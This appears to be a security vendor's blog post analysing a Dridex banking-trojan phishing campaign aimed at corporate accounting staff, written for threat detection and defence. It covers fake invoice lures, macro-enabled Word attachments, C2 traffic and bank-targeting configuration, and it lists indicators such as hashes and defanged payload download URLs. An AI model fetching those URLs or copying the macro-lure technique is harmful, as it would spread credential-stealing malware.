Dridex Attacks Target Corporate Accounting
In February, Cisco Managed Threat Defense (MTD) security investigators detected a rash of Dridex credential-stealing malware delivered via Microsoft Office macros. It’s effective, and the lures appear targeted at those responsible for handling purchase orders and invoices. Here’s a breakdown of the types of emails we’ve observed phishing employees and inserting trojans into user devices.
Attackers have been creating new variants of the Dridex infostealer and sending them out using botnets every few days for the past several months, as reported in December by the Talos Group. The same group of attackers have been operating botnets of Dridex infected computers since October 2014. The Dridex botnets are referenced by number. For example, the number 120, found in its trojan configuration file, pins this victim to the 120 botnet. This incident describes an email attack campaign that distributes the infostealer Dridex and controls it via botnet 120.
Victims Tricked into Enabling Macros
Remember that Microsoft Office macros were commonly used to deliver malware from 1996 – 2002. Around 2002, Microsoft changed the default installation of Office so that macros would not run automatically when a document containing macros was opened. In October of 2014, attackers changed their method to trick users into enabling macros, as you’ll see in this incident.
Here’s the fake invoice our victim received.
Cisco MTD telemetry indicates that the victim read this email via Outlook webmail at gadgets.live.com at 14:17:37 UTC. A while later, at 15:44:49 UTC, the user opened the email attachment, named 14109KW.doc, and enabled macros. This started the infection process to install the Dridex infostealer.
Cisco MTD analysis of the document using the ExifTool found that it contained no characters.
Document metadata indicates the computer it was created on was in a country using the Cyrillic alphabet
File Size: 50688 bytes
SHA256 hash: 84ef5406a61b4fb0703768a120e9f107d569387276357d88ef77c936c1ec109a
MD5 hash: dda0e41140a88f59ca25f4f987a8e862
When the user opened the document, they saw the following blank document.
Probably thinking that enabling macros would make the document display correctly, the victim enabled macros, which triggered the malicious payload.
Cisco MTD investigators use IP lists from botnet trackers to hunt for Dridex connections, correlating related alerts and full packet capture to verify the compromise. In this case, a victim was discovered exfiltrating data to the Dridex botnet, as illustrated below.
Correlation with Alerts and Packet Capture
Once the connection was observed, the Cisco MTD investigator searched for correlating events to confirm the breach. The Sourcefire retrospective file event below demonstrated that the compromise was progressing. Due to the low detection by antivirus, the malicious document nor the malware downloaded by the macro were blocked by endpoint controls; the final payload, the Dridex trojan, started running on the target host. Here’s the initial alert.
Once the investigator observed the malicious file alert, he searched and correlated an HTTP POST connection to the Dridex malware command and control (C2) server. Using full packet capture, the Cisco MTD investigator analyzed the HTTP POST and correlated a final confirmation, the telltale indicators of Dridex inside the HTTP header, shown below.
Uncovering the Dridex Configuration Files
The server at IP address 188.8.131.52 is located in Russia and has been used for hosting malware for the past 11 months.
The server responded to the POST connection with a large transfer of 379,549 bytes containing configuration information for the Dridex malware. This file tells the malware on which websites to intercept passwords from users. Specifically, it lists 338 online banking websites. In this case, most of the banks are in Europe, UK, or Asia. If an infected victim visits one of these banks’ websites, the malware will copy the authentication credentials and send it to the Dridex botnet.
As an added capability, Dridex can inject HTML as the bank websites are displayed to ask the user for extra information, such as their Social Security number or ATM PIN, at login. This extra information is also sent to the botnet to be used for financial fraud and identity theft.
The packets captured during this attack enabled the investigator to study the trojan hidden inside the macro. It was obfuscated with random code that is never called so as to avoid malware detection controls found in antivirus software. Buried in all the junk code was this string of hex-encoded values:
When macros are enabled and the macro runs, this string of Hex numbers is converted to ASCII to create the URL of the payload:
This EXE downloaded by the macro is saved as %TEMP%\dsHHH.exe on the host. At the time of analysis, this binary was detected as malware by only 7 of 57 antivirus programs.
Cisco MTD research found that variations of the macro used in this attack got the Dridex download from different locations including:hxxp://92[.]63[.]87[.]40/aksjdderwd/asdbwk/dhoei.exe hxxp://95[.]163[.]121[.]217/aksjdderwd/asdbwk/dhoei.exe hxxp://95[.]163[.]121[.]219/aksjdderwd/asdbwk/dhoei.exe hxxp://62[.]76[.]188[.]221/aksjdderwd/asdbwk/dhoei.exe
Upon execution, the EXE creates a DLL file which was detected as malicious by only 3 of 57 antivirus programs. This DLL implements the infostealer functions of Dridex and communicates with the Dridex botnet. To do that, it uses a configuration file containing the botnet number and IP addresses of the botnet servers:
This case shows the value of leveraging security intelligence intersected with network forensics via NetFlow. Vigilant detection is necessary to catch advanced threats, since they are designed to evade existing security controls such as antivirus software. These tools, along with confirmation via full packet capture, enabled investigators to detect the malware, confirm the breaches, trace out the origin of the attacks, and guide the customer to safely mitigate this threat. Armed with this understanding, customers changed at-risk passwords with pinpoint precision, and guided users to watch for this new phishing campaign, advising them not to enable macros when receiving unexpected documents.Tags: